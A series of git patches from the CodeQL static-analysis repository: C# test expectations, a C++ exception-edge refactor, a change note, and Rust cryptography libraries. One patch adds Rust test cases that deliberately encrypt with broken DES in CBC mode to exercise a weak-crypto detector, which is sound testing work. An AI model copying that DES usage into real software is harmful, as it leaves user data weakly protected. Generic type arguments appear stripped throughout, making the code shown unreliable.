14:59:37 +0000 Subject: [PATCH 0838/1267] C#: Accept test changes. --- .../library-tests/dataflow/library/FlowSummaries.expected | 8 ++++++++ .../dataflow/library/FlowSummariesFiltered.expected | 8 ++++++++ 2 files changed, 16 insertions(+) diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected index 033c83df3bd..25e4a9317eb 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected @@ -1506,6 +1506,14 @@ summary | Microsoft.AspNetCore.Mvc;ApiBehaviorOptions;GetEnumerator;();Argument[this].Element;ReturnValue.Property[System.Collections.IEnumerator.Current];value;manual | | Microsoft.AspNetCore.Mvc;ApiBehaviorOptions;set_InvalidModelStateResponseFactory;(System.Func);Argument[0];Argument[0].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;Controller;OnActionExecutionAsync;(Microsoft.AspNetCore.Mvc.Filters.ActionExecutingContext,Microsoft.AspNetCore.Mvc.Filters.ActionExecutionDelegate);Argument[1];Argument[1].Parameter[delegate-self];value;hq-generated | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected index 199ccee5a50..4d315854b67 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected @@ -555,6 +555,14 @@ | Microsoft.AspNetCore.Mvc.ViewFeatures;TryGetValueDelegate;BeginInvoke;(System.Object,System.String,System.Object,System.AsyncCallback,System.Object);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc.ViewFeatures;ViewDataInfo;ViewDataInfo;(System.Object,System.Reflection.PropertyInfo,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ApiBehaviorOptions;set_InvalidModelStateResponseFactory;(System.Func);Argument[0];Argument[0].Parameter[delegate-self];value;hq-generated | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | From 57fc3fbfe379b622bea2d1154ac151c6fc6ef1fe Mon Sep 17 00:00:00 2001 From: "REDMOND\\brodes" Date: Thu, 5 Dec 2024 10:10:56 -0500 Subject: [PATCH 0839/1267] Switching from isSeh bools to sublcassed ExceptionEdge. --- .../code/cpp/ir/implementation/EdgeKind.qll | 45 ++++++++++++++++--- .../raw/internal/TranslatedCall.qll | 2 +- .../raw/internal/TranslatedExpr.qll | 4 +- .../raw/internal/TranslatedStmt.qll | 2 +- 4 files changed, 44 insertions(+), 9 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 0fd31c9f45e..6d74ccf30ff 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -8,7 +8,8 @@ private newtype TEdgeKind = TGotoEdge() or // Single successor (including fall-through) TTrueEdge() or // 'true' edge of conditional branch TFalseEdge() or // 'false' edge of conditional branch - TExceptionEdge() or // Thrown exception + TCppExceptionEdge() or // Thrown C++ exception + TSehExceptionEdge() or // Thrown C++ exception TDefaultEdge() or // 'default' label of switch TCaseEdge(string minValue, string maxValue) { // Case label of switch @@ -51,12 +52,33 @@ class FalseEdge extends EdgeKindImpl, TFalseEdge { final override string toString() { result = "False" } } +abstract private class ExceptionEdgeImpl extends EdgeKindImpl { } + /** * An "exception" edge, representing the successor of an instruction when that * instruction's evaluation throws an exception. + * + * Exception edges are expclitly sublcassed to + * `CppExceptionEdge` and `SehExceptionEdge` only. + * Further sublcasses, if required, should be added privately + * here for IR efficiency. */ -class ExceptionEdge extends EdgeKindImpl, TExceptionEdge { - final override string toString() { result = "Exception" } +final class ExceptionEdge = ExceptionEdgeImpl; + +/** + * An "exception" edge, representing the successor of an instruction when that + * instruction's evaluation throws an exception for C++ exceptions + */ +class CppExceptionEdge extends ExceptionEdgeImpl, TCppExceptionEdge { + final override string toString() { result = "C++ Exception" } +} + +/** + * An "exception" edge, representing the successor of an instruction when that + * instruction's evaluation throws an exception for SEH exceptions + */ +class SehExceptionEdge extends ExceptionEdgeImpl, TSehExceptionEdge { + final override string toString() { result = "SEH Exception" } } /** @@ -123,9 +145,22 @@ module EdgeKind { FalseEdge falseEdge() { result = TFalseEdge() } /** - * Gets the single instance of the `ExceptionEdge` class. + * Gets an instance of the `CppExceptionEdge` class. */ - ExceptionEdge exceptionEdge() { result = TExceptionEdge() } + CppExceptionEdge cppExceptionEdge() { result = TCppExceptionEdge() } + + /** + * Gets an instance of the `SehExceptionEdge` class. + */ + SehExceptionEdge sehExceptionEdge() { result = TSehExceptionEdge() } + + /** + * Gets an instance of the `ExceptionEdge` class. + */ + ExceptionEdge exceptionEdge() { + result = cppExceptionEdge() or + result = sehExceptionEdge() + } /** * Gets the single instance of the `DefaultEdge` class. diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll index 3ee11747635..4f8932c4a28 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll @@ -88,7 +88,7 @@ abstract class TranslatedCall extends TranslatedExpr { result = this.getParent().getChildSuccessor(this, kind) or this.mayThrowException() and - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll index 5dc22a810f1..573df94a740 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll @@ -3039,7 +3039,7 @@ class TranslatedDestructorsAfterThrow extends TranslatedElement, TTranslatedDest or // And otherwise, exit this element with an exceptional edge not exists(this.getChild(id + 1)) and - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } @@ -3078,7 +3078,7 @@ abstract class TranslatedThrowExpr extends TranslatedNonConstantExpr { result = this.getDestructors().getFirstInstruction(kind) or not exists(this.getDestructors()) and - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll index 5f70a21fdb8..e0c7d625e81 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll @@ -932,7 +932,7 @@ class TranslatedCatchByTypeHandler extends TranslatedHandler { kind instanceof GotoEdge and result = this.getParameter().getFirstInstruction(kind) or - kind = EdgeKind::exceptionEdge(false) and + kind instanceof CppExceptionEdge and if exists(this.getDestructors()) then result = this.getDestructors().getFirstInstruction(any(GotoEdge edge)) else result = this.getParent().(TranslatedTryStmt).getNextHandler(this, any(GotoEdge edge)) From 7aed4c3cbfedcf9add643c1a802282953bcca242 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 15:13:38 +0000 Subject: [PATCH 0840/1267] C++: Change note --- cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md diff --git a/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md new file mode 100644 index 00000000000..2004cd08248 --- /dev/null +++ b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The "Badly bounded write" query (`cpp/badly-bounded-write`) query no longer produces results if there is an extraction error in the type of the output buffer. From 6c4e0a99e22a2539fc27fa6ad6109595f5c7ec52 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 3 Dec 2024 18:00:46 +0000 Subject: [PATCH 0841/1267] Rust: A few more test cases. --- .../query-tests/security/CWE-327/options.yml | 1 + .../security/CWE-327/test_cipher.rs | 26 +++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/rust/ql/test/query-tests/security/CWE-327/options.yml b/rust/ql/test/query-tests/security/CWE-327/options.yml index 72d848f4ca0..5a3cf0cab12 100644 --- a/rust/ql/test/query-tests/security/CWE-327/options.yml +++ b/rust/ql/test/query-tests/security/CWE-327/options.yml @@ -7,3 +7,4 @@ qltest_dependencies: - des = { version = "0.8.1" } - rc2 = { version = "0.8.1" } - rc5 = { version = "0.0.1" } + - cbc = { version = "0.1.2" } diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs index 34f47130e3a..a0230881044 100644 --- a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs @@ -115,3 +115,29 @@ fn test_block_cipher( rc5_cipher2.encrypt_block(data.into()); rc5_cipher2.decrypt_block(data.into()); } + +type MyDesEncryptor = cbc::Encryptor; + +fn test_cbc( + key: &[u8], key128: &[u8;16], iv: &[u8], iv128: &[u8;16], + input: &[u8], data: &mut [u8] +) { + let data_len = data.len(); + + // aes + let aes_cipher1 = cbc::Encryptor::::new(key128.into(), iv128.into()); + _ = aes_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); + + // des (broken) + let des_cipher1 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher1.encrypt_padded_mut::(data, data_len).unwrap(); + + let des_cipher2 = MyDesEncryptor::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher2.encrypt_padded_mut::(data, data_len).unwrap(); + + let des_cipher3 = cbc::Encryptor::::new_from_slices(&key, &iv).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher3.encrypt_padded_mut::(data, data_len).unwrap(); + + let des_cipher4 = cbc::Encryptor::::new(key.into(), iv.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + _ = des_cipher4.encrypt_padded_b2b_mut::(input, data).unwrap(); +} From 07e3421f6f99381aa299e106cdf19cf52f559d44 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Wed, 4 Dec 2024 14:23:46 +0000 Subject: [PATCH 0842/1267] Rust: Add shared ConceptsShared.qll, CryptoAlgorithms.qll and CryptoAlgorithmNames.qll to Rust. --- config/identical-files.json | 9 +- .../codeql/rust/internal/ConceptsImports.qll | 7 + .../codeql/rust/internal/ConceptsShared.qll | 181 ++++++++++++++++++ .../codeql/rust/security/CryptoAlgorithms.qll | 117 +++++++++++ .../internal/CryptoAlgorithmNames.qll | 84 ++++++++ 5 files changed, 395 insertions(+), 3 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/internal/ConceptsImports.qll create mode 100644 rust/ql/lib/codeql/rust/internal/ConceptsShared.qll create mode 100644 rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll create mode 100644 rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll diff --git a/config/identical-files.json b/config/identical-files.json index c4436872b9a..064da36677d 100644 --- a/config/identical-files.json +++ b/config/identical-files.json @@ -288,12 +288,14 @@ "CryptoAlgorithms Python/JS/Ruby": [ "javascript/ql/lib/semmle/javascript/security/CryptoAlgorithms.qll", "python/ql/lib/semmle/python/concepts/CryptoAlgorithms.qll", - "ruby/ql/lib/codeql/ruby/security/CryptoAlgorithms.qll" + "ruby/ql/lib/codeql/ruby/security/CryptoAlgorithms.qll", + "rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll" ], "CryptoAlgorithmNames Python/JS/Ruby": [ "javascript/ql/lib/semmle/javascript/security/internal/CryptoAlgorithmNames.qll", "python/ql/lib/semmle/python/concepts/internal/CryptoAlgorithmNames.qll", - "ruby/ql/lib/codeql/ruby/security/internal/CryptoAlgorithmNames.qll" + "ruby/ql/lib/codeql/ruby/security/internal/CryptoAlgorithmNames.qll", + "rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll" ], "SensitiveDataHeuristics Python/JS": [ "javascript/ql/lib/semmle/javascript/security/internal/SensitiveDataHeuristics.qll", @@ -308,7 +310,8 @@ "Concepts Python/Ruby/JS": [ "python/ql/lib/semmle/python/internal/ConceptsShared.qll", "ruby/ql/lib/codeql/ruby/internal/ConceptsShared.qll", - "javascript/ql/lib/semmle/javascript/internal/ConceptsShared.qll" + "javascript/ql/lib/semmle/javascript/internal/ConceptsShared.qll", + "rust/ql/lib/codeql/rust/internal/ConceptsShared.qll" ], "ApiGraphModels": [ "javascript/ql/lib/semmle/javascript/frameworks/data/internal/ApiGraphModels.qll", diff --git a/rust/ql/lib/codeql/rust/internal/ConceptsImports.qll b/rust/ql/lib/codeql/rust/internal/ConceptsImports.qll new file mode 100644 index 00000000000..341f3ade509 --- /dev/null +++ b/rust/ql/lib/codeql/rust/internal/ConceptsImports.qll @@ -0,0 +1,7 @@ +/** + * This file contains imports required for the Rust version of `ConceptsShared.qll`. + * Since they are language-specific, they can't be placed directly in that file, as it is shared between languages. + */ + +import codeql.rust.dataflow.DataFlow::DataFlow as DataFlow +import codeql.rust.security.CryptoAlgorithms as CryptoAlgorithms diff --git a/rust/ql/lib/codeql/rust/internal/ConceptsShared.qll b/rust/ql/lib/codeql/rust/internal/ConceptsShared.qll new file mode 100644 index 00000000000..135f830e47d --- /dev/null +++ b/rust/ql/lib/codeql/rust/internal/ConceptsShared.qll @@ -0,0 +1,181 @@ +/** + * Provides Concepts which are shared across languages. + * + * Each language has a language specific `Concepts.qll` file that can import the + * shared concepts from this file. A language can either re-export the concept directly, + * or can add additional member-predicates that are needed for that language. + * + * Moving forward, `Concepts.qll` will be the staging ground for brand new concepts from + * each language, but we will maintain a discipline of moving those concepts to + * `ConceptsShared.qll` ASAP. + */ + +private import ConceptsImports + +/** + * Provides models for cryptographic concepts. + * + * Note: The `CryptographicAlgorithm` class currently doesn't take weak keys into + * consideration for the `isWeak` member predicate. So RSA is always considered + * secure, although using a low number of bits will actually make it insecure. We plan + * to improve our libraries in the future to more precisely capture this aspect. + */ +module Cryptography { + class CryptographicAlgorithm = CryptoAlgorithms::CryptographicAlgorithm; + + class EncryptionAlgorithm = CryptoAlgorithms::EncryptionAlgorithm; + + class HashingAlgorithm = CryptoAlgorithms::HashingAlgorithm; + + class PasswordHashingAlgorithm = CryptoAlgorithms::PasswordHashingAlgorithm; + + /** + * A data-flow node that is an application of a cryptographic algorithm. For example, + * encryption, decryption, signature-validation. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `CryptographicOperation::Range` instead. + */ + class CryptographicOperation extends DataFlow::Node instanceof CryptographicOperation::Range { + /** Gets the algorithm used, if it matches a known `CryptographicAlgorithm`. */ + CryptographicAlgorithm getAlgorithm() { result = super.getAlgorithm() } + + /** Gets the data-flow node where the cryptographic algorithm used in this operation is configured. */ + DataFlow::Node getInitialization() { result = super.getInitialization() } + + /** Gets an input the algorithm is used on, for example the plain text input to be encrypted. */ + DataFlow::Node getAnInput() { result = super.getAnInput() } + + /** + * Gets the block mode used to perform this cryptographic operation. + * + * This predicate is only expected to have a result if two conditions hold: + * 1. The operation is an encryption operation, i.e. the algorithm used is an `EncryptionAlgorithm`, and + * 2. The algorithm used is a block cipher (not a stream cipher). + * + * If either of these conditions do not hold, then this predicate should have no result. + */ + BlockMode getBlockMode() { result = super.getBlockMode() } + } + + /** Provides classes for modeling new applications of a cryptographic algorithms. */ + module CryptographicOperation { + /** + * A data-flow node that is an application of a cryptographic algorithm. For example, + * encryption, decryption, signature-validation. + * + * Extend this class to model new APIs. If you want to refine existing API models, + * extend `CryptographicOperation` instead. + */ + abstract class Range extends DataFlow::Node { + /** Gets the data-flow node where the cryptographic algorithm used in this operation is configured. */ + abstract DataFlow::Node getInitialization(); + + /** Gets the algorithm used, if it matches a known `CryptographicAlgorithm`. */ + abstract CryptographicAlgorithm getAlgorithm(); + + /** Gets an input the algorithm is used on, for example the plain text input to be encrypted. */ + abstract DataFlow::Node getAnInput(); + + /** + * Gets the block mode used to perform this cryptographic operation. + * + * This predicate is only expected to have a result if two conditions hold: + * 1. The operation is an encryption operation, i.e. the algorithm used is an `EncryptionAlgorithm`, and + * 2. The algorithm used is a block cipher (not a stream cipher). + * + * If either of these conditions do not hold, then this predicate should have no result. + */ + abstract BlockMode getBlockMode(); + } + } + + /** + * A cryptographic block cipher mode of operation. This can be used to encrypt + * data of arbitrary length using a block encryption algorithm. + */ + class BlockMode extends string { + BlockMode() { + this = + [ + "ECB", "CBC", "GCM", "CCM", "CFB", "OFB", "CTR", "OPENPGP", + "XTS", // https://csrc.nist.gov/publications/detail/sp/800-38e/final + "EAX" // https://en.wikipedia.org/wiki/EAX_mode + ] + } + + /** Holds if this block mode is considered to be insecure. */ + predicate isWeak() { this = "ECB" } + + /** Holds if the given string appears to match this block mode. */ + bindingset[s] + predicate matchesString(string s) { s.toUpperCase().matches("%" + this + "%") } + } +} + +/** Provides classes for modeling HTTP-related APIs. */ +module Http { + /** Provides classes for modeling HTTP clients. */ + module Client { + /** + * A data-flow node that makes an outgoing HTTP request. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `Http::Client::Request::Range` instead. + */ + class Request extends DataFlow::Node instanceof Request::Range { + /** + * Gets a data-flow node that contributes to the URL of the request. + * Depending on the framework, a request may have multiple nodes which contribute to the URL. + */ + DataFlow::Node getAUrlPart() { result = super.getAUrlPart() } + + /** Gets a string that identifies the framework used for this request. */ + string getFramework() { result = super.getFramework() } + + /** + * Holds if this request is made using a mode that disables SSL/TLS + * certificate validation, where `disablingNode` represents the point at + * which the validation was disabled, and `argumentOrigin` represents the origin + * of the argument that disabled the validation (which could be the same node as + * `disablingNode`). + */ + predicate disablesCertificateValidation( + DataFlow::Node disablingNode, DataFlow::Node argumentOrigin + ) { + super.disablesCertificateValidation(disablingNode, argumentOrigin) + } + } + + /** Provides a class for modeling new HTTP requests. */ + module Request { + /** + * A data-flow node that makes an outgoing HTTP request. + * + * Extend this class to model new APIs. If you want to refine existing API models, + * extend `Http::Client::Request` instead. + */ + abstract class Range extends DataFlow::Node { + /** + * Gets a data-flow node that contributes to the URL of the request. + * Depending on the framework, a request may have multiple nodes which contribute to the URL. + */ + abstract DataFlow::Node getAUrlPart(); + + /** Gets a string that identifies the framework used for this request. */ + abstract string getFramework(); + + /** + * Holds if this request is made using a mode that disables SSL/TLS + * certificate validation, where `disablingNode` represents the point at + * which the validation was disabled, and `argumentOrigin` represents the origin + * of the argument that disabled the validation (which could be the same node as + * `disablingNode`). + */ + abstract predicate disablesCertificateValidation( + DataFlow::Node disablingNode, DataFlow::Node argumentOrigin + ); + } + } + } +} diff --git a/rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll b/rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll new file mode 100644 index 00000000000..7176c666c57 --- /dev/null +++ b/rust/ql/lib/codeql/rust/security/CryptoAlgorithms.qll @@ -0,0 +1,117 @@ +/** + * Provides classes modeling cryptographic algorithms, separated into strong and weak variants. + * + * The classification into strong and weak are based on Wikipedia, OWASP and Google (2021). + */ + +private import internal.CryptoAlgorithmNames + +/** + * A cryptographic algorithm. + */ +private newtype TCryptographicAlgorithm = + MkHashingAlgorithm(string name, boolean isWeak) { + isStrongHashingAlgorithm(name) and isWeak = false + or + isWeakHashingAlgorithm(name) and isWeak = true + } or + MkEncryptionAlgorithm(string name, boolean isWeak) { + isStrongEncryptionAlgorithm(name) and isWeak = false + or + isWeakEncryptionAlgorithm(name) and isWeak = true + } or + MkPasswordHashingAlgorithm(string name, boolean isWeak) { + isStrongPasswordHashingAlgorithm(name) and isWeak = false + or + isWeakPasswordHashingAlgorithm(name) and isWeak = true + } + +/** + * Gets the most specific `CryptographicAlgorithm` that matches the given `name`. + * A matching algorithm is one where the name of the algorithm matches the start of name, with allowances made for different name formats. + * In the case that multiple `CryptographicAlgorithm`s match the given `name`, the algorithm(s) with the longest name will be selected. This is intended to select more specific versions of algorithms when multiple versions could match - for example "SHA3_224" matches against both "SHA3" and "SHA3224", but the latter is a more precise match. + */ +bindingset[name] +private CryptographicAlgorithm getBestAlgorithmForName(string name) { + result = + max(CryptographicAlgorithm algorithm | + algorithm.getName() = + [ + name.toUpperCase(), // the full name + name.toUpperCase().regexpCapture("^([\\w]+)(?:-.*)?$", 1), // the name prior to any dashes or spaces + name.toUpperCase().regexpCapture("^([A-Z0-9]+)(?:(-|_).*)?$", 1) // the name prior to any dashes, spaces, or underscores + ].regexpReplaceAll("[-_ ]", "") // strip dashes, underscores, and spaces + | + algorithm order by algorithm.getName().length() + ) +} + +/** + * A cryptographic algorithm. + */ +abstract class CryptographicAlgorithm extends TCryptographicAlgorithm { + /** Gets a textual representation of this element. */ + string toString() { result = this.getName() } + + /** + * Gets the normalized name of this algorithm (upper-case, no spaces, dashes or underscores). + */ + abstract string getName(); + + /** + * Holds if the name of this algorithm is the most specific match for `name`. + * This predicate matches quite liberally to account for different ways of formatting algorithm names, e.g. using dashes, underscores, or spaces as separators, including or not including block modes of operation, etc. + */ + bindingset[name] + predicate matchesName(string name) { this = getBestAlgorithmForName(name) } + + /** + * Holds if this algorithm is weak. + */ + abstract predicate isWeak(); +} + +/** + * A hashing algorithm such as `MD5` or `SHA512`. + */ +class HashingAlgorithm extends MkHashingAlgorithm, CryptographicAlgorithm { + string name; + boolean isWeak; + + HashingAlgorithm() { this = MkHashingAlgorithm(name, isWeak) } + + override string getName() { result = name } + + override predicate isWeak() { isWeak = true } +} + +/** + * An encryption algorithm such as `DES` or `AES512`. + */ +class EncryptionAlgorithm extends MkEncryptionAlgorithm, CryptographicAlgorithm { + string name; + boolean isWeak; + + EncryptionAlgorithm() { this = MkEncryptionAlgorithm(name, isWeak) } + + override string getName() { result = name } + + override predicate isWeak() { isWeak = true } + + /** Holds if this algorithm is a stream cipher. */ + predicate isStreamCipher() { isStreamCipher(name) } +} + +/** + * A password hashing algorithm such as `PBKDF2` or `SCRYPT`. + */ +class PasswordHashingAlgorithm extends MkPasswordHashingAlgorithm, CryptographicAlgorithm { + string name; + boolean isWeak; + + PasswordHashingAlgorithm() { this = MkPasswordHashingAlgorithm(name, isWeak) } + + override string getName() { result = name } + + override predicate isWeak() { isWeak = true } +} diff --git a/rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll b/rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll new file mode 100644 index 00000000000..8bb63d97876 --- /dev/null +++ b/rust/ql/lib/codeql/rust/security/internal/CryptoAlgorithmNames.qll 